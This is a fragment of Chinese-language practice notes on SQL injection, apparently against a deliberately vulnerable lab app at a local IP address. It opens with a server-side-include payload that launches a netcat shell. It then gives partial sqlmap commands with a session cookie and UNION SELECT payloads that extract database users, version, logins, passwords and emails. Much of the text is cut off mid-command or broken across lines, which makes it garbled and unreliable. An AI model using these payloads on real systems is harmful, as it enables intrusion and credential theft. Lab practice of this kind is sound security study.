--#exec cmd="nc -lvp 8888 -e bin/bash" -->
1.12-SQL Injection (GET/Search)
直接用SQLMAP可以跑出来
C:\Python27...title=abb&act
ion=
search --cookie "PHPSESSID=80cfc277961f5a0a812100ab0c5e620a;
security_level=0"
C:...title=abb&ac
tion=search" --cookie "PHPSESSID=80cfc277961f5a0a812100ab0c5e620a; security_leve
l=0" --...输入a' union select 1,user(),@@version,4,5,6,7 #&action=search
输入a' union select 1,login,password,email...movie=11%20union%20select%201,2,3,4,5,6,7#&action=go
(这边为什么需要让MOVIE参数出错之后才能显示结果)
http://192.168.0.128